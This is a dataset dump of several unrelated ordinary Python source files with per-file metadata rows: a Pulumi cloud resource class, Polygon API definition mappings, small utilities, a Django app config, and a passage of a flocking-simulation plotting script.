:param str resource_name: The name of the resource.
:param VpcAccessArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VpcAccessArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VpcAccessArgs.__new__(VpcAccessArgs)
if instance_id is None and not opts.urn:
raise TypeError("Missing required property 'instance_id'")
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["name"] = name
if port is None and not opts.urn:
raise TypeError("Missing required property 'port'")
__props__.__dict__["port"] = port
if vpc_id is None and not opts.urn:
raise TypeError("Missing required property 'vpc_id'")
__props__.__dict__["vpc_id"] = vpc_id
super(VpcAccess, __self__).__init__(
'alicloud:apigateway/vpcAccess:VpcAccess',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
instance_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None) -> 'VpcAccess':
"""
Get an existing VpcAccess resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] instance_id: ID of the instance in VPC (ECS/Server Load Balance).
:param pulumi.Input[str] name: The name of the vpc authorization.
:param pulumi.Input[int] port: ID of the port corresponding to the instance.
:param pulumi.Input[str] vpc_id: The vpc id of the vpc authorization.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VpcAccessState.__new__(_VpcAccessState)
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["name"] = name
__props__.__dict__["port"] = port
__props__.__dict__["vpc_id"] = vpc_id
return VpcAccess(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Output[str]:
"""
ID of the instance in VPC (ECS/Server Load Balance).
"""
return pulumi.get(self, "instance_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the vpc authorization.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
ID of the port corresponding to the instance.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Output[str]:
"""
The vpc id of the vpc authorization.
"""
return pulumi.get(self, "vpc_id")
| 37.131579 | 134 | 0.61118 | 1,362 | 11,288 | 4.84141 | 0.110132 | 0.093418 | 0.087049 | 0.070064 | 0.751896 | 0.716106 | 0.691386 | 0.648165 | 0.640431 | 0.62663 | 0 | 0.001601 | 0.280829 | 11,288 | 303 | 135 | 37.254125 | 0.810668 | 0.271793 | 0 | 0.602273 | 1 | 0 | 0.079619 | 0.005158 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153409 | false | 0.005682 | 0.028409 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6a4f45597597bd19a6b6e1eddcb0eec72e2d136f | 11,318 | py | Python | polygon/library.py | rayeef/polygon | b69d614c8f1d83bc0b07ea705fa781441a70fc9a | [
"Apache-2.0"
] | null | null | null | polygon/library.py | rayeef/polygon | b69d614c8f1d83bc0b07ea705fa781441a70fc9a | [
"Apache-2.0"
] | null | null | null | polygon/library.py | rayeef/polygon | b69d614c8f1d83bc0b07ea705fa781441a70fc9a | [
"Apache-2.0"
] | null | null | null | from definitions import LastTrade
from definitions import LastQuote
from definitions import HistTrade
from definitions import Quote
from definitions import Aggregate
from definitions import Company
from definitions import CompanyV3
from definitions import Address
from definitions import Symbol
from definitions import SymbolV3
from definitions import Dividend
from definitions import News
from definitions import NewsV2
from definitions import Publisher
from definitions import Earning
from definitions import Financial
from definitions import Exchange
from definitions import Error
from definitions import NotFound
from definitions import Conflict
from definitions import Unauthorized
from definitions import MarketStatus
from definitions import MarketHoliday
from definitions import AnalystRatings
from definitions import RatingSection
from definitions import CryptoTick
from definitions import CryptoTickJson
from definitions import CryptoExchange
from definitions import CryptoSnapshotTicker
from definitions import CryptoSnapshotBookItem
from definitions import CryptoSnapshotTickerBook
from definitions import CryptoSnapshotAgg
from definitions import Forex
from definitions import LastForexTrade
from definitions import LastForexQuote
from definitions import ForexAggregate
from definitions import ForexSnapshotTicker
from definitions import ForexSnapshotAgg
from definitions import Ticker
from definitions import Split
from definitions import Financials
from definitions import Trade
from definitions import StocksSnapshotTicker
from definitions import StocksSnapshotBookItem
from definitions import StocksSnapshotTickerBook
from definitions import StocksV2Trade
from definitions import StocksV2NBBO
from definitions import StocksSnapshotAgg
from definitions import StocksSnapshotQuote
from definitions import Aggv2
from definitions import AggResponse
from definitions import ReferenceTickersApiResponse
from definitions import ReferenceTickersV3ApiResponse
from definitions import ReferenceTickerTypesApiResponse
from definitions import ReferenceTickerDetailsApiResponse
from definitions import ReferenceTickerDetailsV3ApiResponse
from definitions import ReferenceTickerNewsApiResponse
from definitions import ReferenceTickerNewsV2ApiResponse
from definitions import ReferenceMarketsApiResponse
from definitions import ReferenceLocalesApiResponse
from definitions import ReferenceStockSplitsApiResponse
from definitions import ReferenceStockDividendsApiResponse
from definitions import ReferenceStockFinancialsApiResponse
from definitions import ReferenceMarketStatusApiResponse
from definitions import ReferenceMarketHolidaysApiResponse
from definitions import StocksEquitiesExchangesApiResponse
from definitions import StocksEquitiesHistoricTradesApiResponse
from definitions import HistoricTradesV2ApiResponse
from definitions import StocksEquitiesHistoricQuotesApiResponse
from definitions import HistoricNBboQuotesV2ApiResponse
from definitions import StocksEquitiesLastTradeForASymbolApiResponse
from definitions import StocksEquitiesLastQuoteForASymbolApiResponse
from definitions import StocksEquitiesDailyOpenCloseApiResponse
from definitions import StocksEquitiesConditionMappingsApiResponse
from definitions import StocksEquitiesSnapshotAllTickersApiResponse
from definitions import StocksEquitiesSnapshotSingleTickerApiResponse
from definitions import StocksEquitiesSnapshotGainersLosersApiResponse
from definitions import StocksEquitiesPreviousCloseApiResponse
from definitions import StocksEquitiesAggregatesApiResponse
from definitions import StocksEquitiesGroupedDailyApiResponse
from definitions import ForexCurrenciesHistoricForexTicksApiResponse
from definitions import ForexCurrenciesRealTimeCurrencyConversionApiResponse
from definitions import ForexCurrenciesLastQuoteForACurrencyPairApiResponse
from definitions import ForexCurrenciesGroupedDailyApiResponse
from definitions import ForexCurrenciesPreviousCloseApiResponse
from definitions import ForexCurrenciesSnapshotAllTickersApiResponse
from definitions import ForexCurrenciesSnapshotSingleTickerApiResponse
from definitions import ForexCurrenciesSnapshotGainersLosersApiResponse
from definitions import CryptoCryptoExchangesApiResponse
from definitions import CryptoLastTradeForACryptoPairApiResponse
from definitions import CryptoDailyOpenCloseApiResponse
from definitions import CryptoHistoricCryptoTradesApiResponse
from definitions import CryptoGroupedDailyApiResponse
from definitions import CryptoPreviousCloseApiResponse
from definitions import CryptoSnapshotAllTickersApiResponse
from definitions import CryptoSnapshotSingleTickerApiResponse
from definitions import CryptoSnapshotSingleTickerFullBookApiResponse
from definitions import CryptoSnapshotGainersLosersApiResponse
from definitions import CurrenciesAggregatesApiResponse
from definitions import StockSymbol
from definitions import ConditionTypeMap
from definitions import SymbolTypeMap
from definitions import TickerSymbol
import typing
from definitions import Definition
AnyDefinition = typing.TypeVar("AnyDefinition", bound=Definition)
# noinspection SpellCheckingInspection
name_to_class: typing.Dict[str, typing.Callable[[], typing.Type[AnyDefinition]]] = {
"LastTrade": LastTrade,
"LastQuote": LastQuote,
"HistTrade": HistTrade,
"Quote": Quote,
"Aggregate": Aggregate,
"Company": Company,
"CompanyV3": CompanyV3,
"Address": Address,
"Symbol": Symbol,
"Dividend": Dividend,
"News": News,
"NewsV2": NewsV2,
"Publisher": Publisher,
"Earning": Earning,
"Financial": Financial,
"Exchange": Exchange,
"Error": Error,
"NotFound": NotFound,
"Conflict": Conflict,
"Unauthorized": Unauthorized,
"MarketStatus": MarketStatus,
"MarketHoliday": MarketHoliday,
"AnalystRatings": AnalystRatings,
"RatingSection": RatingSection,
"CryptoTick": CryptoTick,
"CryptoTickJson": CryptoTickJson,
"CryptoExchange": CryptoExchange,
"CryptoSnapshotTicker": CryptoSnapshotTicker,
"CryptoSnapshotBookItem": CryptoSnapshotBookItem,
"CryptoSnapshotTickerBook": CryptoSnapshotTickerBook,
"CryptoSnapshotAgg": CryptoSnapshotAgg,
"Forex": Forex,
"LastForexTrade": LastForexTrade,
"LastForexQuote": LastForexQuote,
"ForexAggregate": ForexAggregate,
"ForexSnapshotTicker": ForexSnapshotTicker,
"ForexSnapshotAgg": ForexSnapshotAgg,
"Ticker": Ticker,
"Split": Split,
"Financials": Financials,
"Trade": Trade,
"StocksSnapshotTicker": StocksSnapshotTicker,
"StocksSnapshotBookItem": StocksSnapshotBookItem,
"StocksSnapshotTickerBook": StocksSnapshotTickerBook,
"StocksV2Trade": StocksV2Trade,
"StocksV2NBBO": StocksV2NBBO,
"StocksSnapshotAgg": StocksSnapshotAgg,
"StocksSnapshotQuote": StocksSnapshotQuote,
"Aggv2": Aggv2,
"AggResponse": AggResponse,
"ReferenceTickersApiResponse": ReferenceTickersApiResponse,
"ReferenceTickersV3ApiResponse": ReferenceTickersV3ApiResponse,
"ReferenceTickerTypesApiResponse": ReferenceTickerTypesApiResponse,
"ReferenceTickerDetailsApiResponse": ReferenceTickerDetailsApiResponse,
"ReferenceTickerDetailsV3ApiResponse": ReferenceTickerDetailsV3ApiResponse,
"ReferenceTickerNewsApiResponse": ReferenceTickerNewsApiResponse,
"ReferenceTickerNewsV2ApiResponse": ReferenceTickerNewsV2ApiResponse,
"ReferenceMarketsApiResponse": ReferenceMarketsApiResponse,
"ReferenceLocalesApiResponse": ReferenceLocalesApiResponse,
"ReferenceStockSplitsApiResponse": ReferenceStockSplitsApiResponse,
"ReferenceStockDividendsApiResponse": ReferenceStockDividendsApiResponse,
"ReferenceStockFinancialsApiResponse": ReferenceStockFinancialsApiResponse,
"ReferenceMarketStatusApiResponse": ReferenceMarketStatusApiResponse,
"ReferenceMarketHolidaysApiResponse": ReferenceMarketHolidaysApiResponse,
"StocksEquitiesExchangesApiResponse": StocksEquitiesExchangesApiResponse,
"StocksEquitiesHistoricTradesApiResponse": StocksEquitiesHistoricTradesApiResponse,
"HistoricTradesV2ApiResponse": HistoricTradesV2ApiResponse,
"StocksEquitiesHistoricQuotesApiResponse": StocksEquitiesHistoricQuotesApiResponse,
"HistoricNBboQuotesV2ApiResponse": HistoricNBboQuotesV2ApiResponse,
"StocksEquitiesLastTradeForASymbolApiResponse": StocksEquitiesLastTradeForASymbolApiResponse,
"StocksEquitiesLastQuoteForASymbolApiResponse": StocksEquitiesLastQuoteForASymbolApiResponse,
"StocksEquitiesDailyOpenCloseApiResponse": StocksEquitiesDailyOpenCloseApiResponse,
"StocksEquitiesConditionMappingsApiResponse": StocksEquitiesConditionMappingsApiResponse,
"StocksEquitiesSnapshotAllTickersApiResponse": StocksEquitiesSnapshotAllTickersApiResponse,
"StocksEquitiesSnapshotSingleTickerApiResponse": StocksEquitiesSnapshotSingleTickerApiResponse,
"StocksEquitiesSnapshotGainersLosersApiResponse": StocksEquitiesSnapshotGainersLosersApiResponse,
"StocksEquitiesPreviousCloseApiResponse": StocksEquitiesPreviousCloseApiResponse,
"StocksEquitiesAggregatesApiResponse": StocksEquitiesAggregatesApiResponse,
"StocksEquitiesGroupedDailyApiResponse": StocksEquitiesGroupedDailyApiResponse,
"ForexCurrenciesHistoricForexTicksApiResponse": ForexCurrenciesHistoricForexTicksApiResponse,
"ForexCurrenciesRealTimeCurrencyConversionApiResponse": ForexCurrenciesRealTimeCurrencyConversionApiResponse,
"ForexCurrenciesLastQuoteForACurrencyPairApiResponse": ForexCurrenciesLastQuoteForACurrencyPairApiResponse,
"ForexCurrenciesGroupedDailyApiResponse": ForexCurrenciesGroupedDailyApiResponse,
"ForexCurrenciesPreviousCloseApiResponse": ForexCurrenciesPreviousCloseApiResponse,
"ForexCurrenciesSnapshotAllTickersApiResponse": ForexCurrenciesSnapshotAllTickersApiResponse,
"ForexCurrenciesSnapshotSingleTickerApiResponse": ForexCurrenciesSnapshotSingleTickerApiResponse,
"ForexCurrenciesSnapshotGainersLosersApiResponse": ForexCurrenciesSnapshotGainersLosersApiResponse,
"CryptoCryptoExchangesApiResponse": CryptoCryptoExchangesApiResponse,
"CryptoLastTradeForACryptoPairApiResponse": CryptoLastTradeForACryptoPairApiResponse,
"CryptoDailyOpenCloseApiResponse": CryptoDailyOpenCloseApiResponse,
"CryptoHistoricCryptoTradesApiResponse": CryptoHistoricCryptoTradesApiResponse,
"CryptoGroupedDailyApiResponse": CryptoGroupedDailyApiResponse,
"CryptoPreviousCloseApiResponse": CryptoPreviousCloseApiResponse,
"CryptoSnapshotAllTickersApiResponse": CryptoSnapshotAllTickersApiResponse,
"CryptoSnapshotSingleTickerApiResponse": CryptoSnapshotSingleTickerApiResponse,
"CryptoSnapshotSingleTickerFullBookApiResponse": CryptoSnapshotSingleTickerFullBookApiResponse,
"CryptoSnapshotGainersLosersApiResponse": CryptoSnapshotGainersLosersApiResponse,
"CurrenciesAggregatesApiResponse": CurrenciesAggregatesApiResponse,
}
# noinspection SpellCheckingInspection
name_to_type = {
"StockSymbol": StockSymbol,
"ConditionTypeMap": ConditionTypeMap,
"SymbolTypeMap": SymbolTypeMap,
"TickerSymbol": TickerSymbol,
} | 50.981982 | 114 | 0.848295 | 646 | 11,318 | 14.856037 | 0.185759 | 0.162551 | 0.227571 | 0.008544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003088 | 0.113006 | 11,318 | 222 | 115 | 50.981982 | 0.952884 | 0.00645 | 0 | 0 | 0 | 0 | 0.218563 | 0.168572 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.495283 | 0 | 0.495283 | 0 | 0 | 0 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
6a71cd9a3a4a72b42c9c16579ec0689070b5b326 | 170 | py | Python | utils/convert_datetime.py | huynhminhtruong/py | 6f90423a62103b2bd28daa0d5a27b4a25bc318c8 | [
"MIT"
] | null | null | null | utils/convert_datetime.py | huynhminhtruong/py | 6f90423a62103b2bd28daa0d5a27b4a25bc318c8 | [
"MIT"
] | null | null | null | utils/convert_datetime.py | huynhminhtruong/py | 6f90423a62103b2bd28daa0d5a27b4a25bc318c8 | [
"MIT"
] | null | null | null | import datetime as dt
date_time_str = '2019-11-04T12:12:51Z'
date_time_obj = dt.datetime.strptime(date_time_str, '%Y-%m-%dT%H:%M:%SZ')
print(date_time_obj.timestamp()) | 24.285714 | 73 | 0.741176 | 32 | 170 | 3.6875 | 0.625 | 0.271186 | 0.186441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089744 | 0.082353 | 170 | 7 | 74 | 24.285714 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6a7c7c04c0b9e8643f9cb05da0c380ed19234a92 | 370 | py | Python | funboost/utils/dependency_packages/mongomq/utils.py | DJMIN/funboost | 7570ca2909bb0b44a1080f5f98aa96c86d3da9d4 | [
"Apache-2.0"
] | 333 | 2019-08-08T10:25:27.000Z | 2022-03-30T07:32:04.000Z | funboost/utils/dependency_packages/mongomq/utils.py | mooti-barry/funboost | 2cd9530e2c4e5a52fc921070d243d402adbc3a0e | [
"Apache-2.0"
] | 38 | 2020-04-24T01:47:51.000Z | 2021-12-20T07:22:15.000Z | funboost/utils/dependency_packages/mongomq/utils.py | mooti-barry/funboost | 2cd9530e2c4e5a52fc921070d243d402adbc3a0e | [
"Apache-2.0"
] | 84 | 2019-08-09T11:51:14.000Z | 2022-03-02T06:29:09.000Z | def enum(name, *sequential, **named):
values = dict(zip(sequential, range(len(sequential))), **named)
# NOTE: Yes, we *really* want to cast using str() here.
# On Python 2 type() requires a byte string (which is str() on Python 2).
# On Python 3 it does not matter, so we'll use str(), which acts as
# a no-op.
return type(str(name), (), values) | 46.25 | 77 | 0.635135 | 60 | 370 | 3.916667 | 0.716667 | 0.102128 | 0.076596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010381 | 0.218919 | 370 | 8 | 78 | 46.25 | 0.802768 | 0.540541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
6a91c867376436aedff1c1b17719fe89d54add01 | 194 | py | Python | resdk/shortcuts/__init__.py | tristanbrown/resolwe-bio-py | c911defde8a5e7e902ad1adf4f9e480f17002c18 | [
"Apache-2.0"
] | 4 | 2016-09-28T16:00:05.000Z | 2018-08-16T16:14:10.000Z | resdk/shortcuts/__init__.py | tristanbrown/resolwe-bio-py | c911defde8a5e7e902ad1adf4f9e480f17002c18 | [
"Apache-2.0"
] | 229 | 2016-03-28T19:41:00.000Z | 2022-03-16T15:02:15.000Z | resdk/shortcuts/__init__.py | tristanbrown/resolwe-bio-py | c911defde8a5e7e902ad1adf4f9e480f17002c18 | [
"Apache-2.0"
] | 18 | 2016-03-10T16:11:57.000Z | 2021-06-01T10:01:49.000Z | """.. Ignore pydocstyle D400.
=========
Shortcuts
=========
Shortcut mixin classes
======================
.. autoclass:: resdk.shortcuts.collection.CollectionRelationsMixin
:members:
"""
| 13.857143 | 66 | 0.582474 | 13 | 194 | 8.692308 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017544 | 0.118557 | 194 | 13 | 67 | 14.923077 | 0.643275 | 0.953608 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6a9a56b22b45a784db590179a8a9211729bf5133 | 50 | py | Python | env/Lib/site-packages/frccontrol/version.py | DiMino-0/Rapid-React-2022-Team810 | 05c61453fce7d9762b119dce4326bbdb1cb8688b | [
"BSD-3-Clause"
] | null | null | null | env/Lib/site-packages/frccontrol/version.py | DiMino-0/Rapid-React-2022-Team810 | 05c61453fce7d9762b119dce4326bbdb1cb8688b | [
"BSD-3-Clause"
] | 5 | 2022-02-13T14:38:04.000Z | 2022-02-15T00:13:07.000Z | env/Lib/site-packages/frccontrol/version.py | DiMino-0/Rapid-React-2022-Team810 | 05c61453fce7d9762b119dce4326bbdb1cb8688b | [
"BSD-3-Clause"
] | 4 | 2022-02-04T22:58:27.000Z | 2022-02-14T19:29:18.000Z | # Autogenerated by setup.py
__version__ = "2022.9" | 25 | 27 | 0.76 | 7 | 50 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113636 | 0.12 | 50 | 2 | 28 | 25 | 0.659091 | 0.5 | 0 | 0 | 1 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6aa102af37c99a906bbbf0f58ec1ef62d9b40076 | 378 | py | Python | src/pyglue/DocStrings/ExceptionMissingFile.py | omenos/OpenColorIO | 7316c3be20752278924dd3f213bff297ffb63a14 | [
"BSD-3-Clause"
] | 7 | 2015-07-01T03:19:43.000Z | 2021-03-27T11:02:16.000Z | src/pyglue/DocStrings/ExceptionMissingFile.py | dictoon/OpenColorIO | 64adcad300adfd166280d2e7b1fb5c3ce7dca482 | [
"BSD-3-Clause"
] | null | null | null | src/pyglue/DocStrings/ExceptionMissingFile.py | dictoon/OpenColorIO | 64adcad300adfd166280d2e7b1fb5c3ce7dca482 | [
"BSD-3-Clause"
] | 2 | 2019-03-05T20:43:59.000Z | 2019-11-11T20:35:55.000Z |
class ExceptionMissingFile:
"""
An exception class for errors detected at runtime, thrown when OCIO cannot
find a file that is expected to exist. This is provided as a custom type to
distinguish cases where one wants to continue looking for missing files,
but wants to properly fail for other error conditions.
"""
def __init__(self):
pass
| 31.5 | 79 | 0.716931 | 54 | 378 | 4.944444 | 0.833333 | 0.052434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246032 | 378 | 11 | 80 | 34.363636 | 0.936842 | 0.73545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
6aacdfa486708ed8b617784dc9cd04599014bd8e | 251 | py | Python | WEEKS/CD_Sata-Structures/general/practice/PYTHON/37 - arrayMaxConsecutiveSum.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/general/practice/PYTHON/37 - arrayMaxConsecutiveSum.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/general/practice/PYTHON/37 - arrayMaxConsecutiveSum.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | def arrayMaxConsecutiveSum(inputArray, k):
arr = [sum(inputArray[:k])]
for i in range(1, len(inputArray) - (k - 1)):
arr.append(arr[i - 1] - inputArray[i - 1] + inputArray[i + k - 1])
sort_arr = sorted(arr)
return sort_arr[-1]
| 35.857143 | 74 | 0.601594 | 37 | 251 | 4.027027 | 0.432432 | 0.221477 | 0.161074 | 0.174497 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030928 | 0.227092 | 251 | 6 | 75 | 41.833333 | 0.737113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6ad298a145a3e0b10594c4465cca34f885db1f68 | 147 | py | Python | mah_tags/apps.py | mahbd/brur-payment | cb9812e1d2f8c22c7015708ca9bb4fc05bfb1452 | [
"MIT"
] | null | null | null | mah_tags/apps.py | mahbd/brur-payment | cb9812e1d2f8c22c7015708ca9bb4fc05bfb1452 | [
"MIT"
] | null | null | null | mah_tags/apps.py | mahbd/brur-payment | cb9812e1d2f8c22c7015708ca9bb4fc05bfb1452 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class MahTagsConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'mah_tags'
| 21 | 56 | 0.761905 | 18 | 147 | 6.055556 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14966 | 147 | 6 | 57 | 24.5 | 0.872 | 0 | 0 | 0 | 0 | 0 | 0.251701 | 0.197279 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
6ad58fa69ec62fd766239b79d36be41ba2a0bd77 | 70,155 | py | Python | model/SDE/s.Imp-em-numpy-mp-net v2-average.py | neulbo-187/Cucker-Smale-Model | e77e8d804be440999c0e410a41364a992b8fcc75 | [
"MIT"
] | 2 | 2021-03-08T11:23:58.000Z | 2021-04-11T11:10:08.000Z | model/SDE/s.Imp-em-numpy-mp-net v2-average.py | neulbo-187/Cucker-Smale-Model | e77e8d804be440999c0e410a41364a992b8fcc75 | [
"MIT"
] | null | null | null | model/SDE/s.Imp-em-numpy-mp-net v2-average.py | neulbo-187/Cucker-Smale-Model | e77e8d804be440999c0e410a41364a992b8fcc75 | [
"MIT"
] | null | null | null |
#%%
import numpy as np
from scipy import integrate
import matplotlib.pyplot as plt
import matplotlib as mpl
import time
from matplotlib import animation, rc
from IPython.display import HTML
from matplotlib.ticker import ScalarFormatter
import matplotlib.gridspec as gridspec
from matplotlib.ticker import MaxNLocator
from mpl_toolkits.axes_grid1.inset_locator import inset_axes, mark_inset
import matplotlib.patches as mpatches
from mpl_toolkits.axes_grid1.inset_locator import (inset_axes, TransformedBbox,BboxPatch, BboxConnector)
from matplotlib.ticker import ScalarFormatter, FormatStrFormatter
import os
import glob
import pandas as pd
#np 참고 http://taewan.kim/post/numpy_cheat_sheet/
def sto_ratio(start,end,below):
if np.min(Vcum[1:,start:end,0,0]) >= below :
ratio = abs(np.max(np.max(Vcum[1:,start:end,0,0],axis=0)-np.min(Vcum[1:,start:end,0,0],axis=0))/(np.max(Vcum[1:,start:end,0,0])-np.min(Vcum[1:,start:end,0,0])))
else :
ratio=0
return ratio
def makeplot():
global fig
# fig=plt.figure(constrained_layout=True,figsize=(10,5))
# spec=gridspec.GridSpec(ncols=9,nrows=6,figure=fig)
# ax=fig.add_subplot(spec[0:3,0:4])
# bx=fig.add_subplot(spec[0:3,4:8])
# bx_larged=fig.add_subplot(spec[0:3,8])
# dx=fig.add_subplot(spec[3:,6:])
## plot1 : graph of (v_t^1)_1 ... (v_t^n)_1 on trial =1
fig_size=(5.1,3.4)
fig=plt.figure(figsize=fig_size)
plt.plot(np.array(range(0,T))*h,[0 for tt in range(T)],linewidth=0.8,c='k')
for i in range(N):
plt.plot(np.array(range(0,T))*h,Vcum[1,:,i,0],alpha=0.6,linewidth=0.3)
axes = plt.axes()
axes.set_xlim(right=(T-2)*h,left=0)
axes.set_xlabel('t')
axes.set_ylabel('velocity',rotation=90)
saveplot(1,plotsave)
## plot2 : graph of (v_t^1)_1 on all trial
fig=plt.figure(figsize=fig_size)
## plot 안에 그래프 그리기 : inset_axes,mark_inset/https://data-newbie.tistory.com/447
axes=plt.axes()
plt.plot(np.array(range(0,T))*h,[0 for tt in range(T)],linewidth=0.8,c='k')
for i in range(Trial) :
plt.plot(np.array(range(0,T))*h,Vcum[i+1,:,0,0],linewidth=0.3, alpha=0.6)
axes.set_xlim(right=(T-2)*h,left=0)
ax_max=max(np.max(Vcum[1:,:,0,0]),-1*np.min(Vcum[1:,:,0,0]))
if np.max(Vcum[1:,:,0,0]) > (-1)*np.min(Vcum[1:,:,0,0]):
# ax_cut=int(np.median(np.argmax(Vcum[1:,:,0,0],axis=1)))
